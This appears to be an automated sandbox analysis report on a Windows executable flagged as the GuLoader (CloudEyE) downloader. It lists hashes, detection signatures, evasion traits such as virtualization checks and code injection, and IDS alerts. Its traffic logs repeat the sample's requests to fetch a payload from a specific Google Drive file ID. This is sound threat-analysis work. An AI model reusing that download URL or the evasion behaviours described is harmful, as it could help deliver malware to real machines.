Windows Analysis Report
ME-SPC-94.03.60.175.07.exe

Overview

General Information

Sample name: ME-SPC-94.03.60.175.07.exe
Analysis ID: 1576273
MD5: 23f5026ef6b69b601f982f0498e02ddb
SHA1: 4fd5aa90b343ca1061992256ae2de8498bc64575
SHA256: be145da99fd91764709334306a81e69f35a06684c37f00249cd170d1f29c12f0
Tags: exe, user-Racco42

Detection

GuLoader
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ME-SPC-94.03.60.175.07.exe (PID: 6932 cmdline: "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe" MD5: 23F5026EF6B69B601F982F0498E02DDB)
    • ME-SPC-94.03.60.175.07.exe (PID: 5064 cmdline: "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe" MD5: 23F5026EF6B69B601F982F0498E02DDB)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Yara matches:
Source: 00000008.00000002.3137684124.0000000005DE6000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_2 | Description: Yara detected GuLoader | Author: Joe Security
Source: 00000004.00000002.1471777576.0000000009256000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_2 | Description: Yara detected GuLoader | Author: Joe Security
No Sigma rule has matched
Suricata IDS alerts:
Timestamp: 2024-12-16T18:05:44.396851+0100 | SID: 2803270 | Severity: 2 | Classtype: Potentially Bad Traffic | Source IP: 192.168.2.7 | Source Port: 49751 | Destination IP: 172.217.19.174 | Destination Port: 443 | Protocol: TCP


      AV Detection

Source: ME-SPC-94.03.60.175.07.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: ME-SPC-94.03.60.175.07.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49760 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49859 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49896 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49903 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49932 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49969 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49986 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49990 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49991 version: TLS 1.2
Source: ME-SPC-94.03.60.175.07.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 4_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004057D0
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 4_2_0040628B FindFirstFileW,FindClose,4_2_0040628B
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 4_2_00402770 FindFirstFileW,4_2_00402770
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 8_2_00402770 FindFirstFileW,8_2_00402770
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 8_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_004057D0
Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe | Code function: 8_2_0040628B FindFirstFileW,FindClose,8_2_0040628B
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49751 -> 172.217.19.174:443
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: global traffic | HTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4AGVAA5_WWVNHbntxDjCPkIOu4s7cmQsXxk7QPYvsNqT9WD6FWjTvEmuyHDoAXwdCWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:05:46 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-unb7a40A_XHPKEdcYKqwdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: 
NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W; expires=Tue, 17-Jun-2025 17:05:46 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5AtbLVvDemcsOze4UxWAJswKKU1OOMjEFkiL9uXjR3uk8jeFJCbQcre-BIKMhLeRdaContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:02 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-J99k5bv_o8rfN7NTLMxwag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6bPUQknQJR2dLSk1W3xO3cIl_Fhp_FPTg82L3MoHt6MutCEPb0gmAsZ5n-WstE5dvrContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:18 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-8lSpDq0z_xTdjpSMhC5onw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC41YOb0Gp3cWeY4Rv6wZr2KfNwO8cRr_GaxLXgZUWfKuXKeLUrKpQmvcZ0Ze-ZpUNWZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:34 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-HFAbTqJA7y5bm2pnrujFuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7dQE9ZmoXTY5c_KfSk0aHr0ZXPqHFBVuMQAfqu6FrtHKXwsgmKed4tHol8b7DsOSfGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:49 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-D8mHoRdbOaOXCdzqSs6Dcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
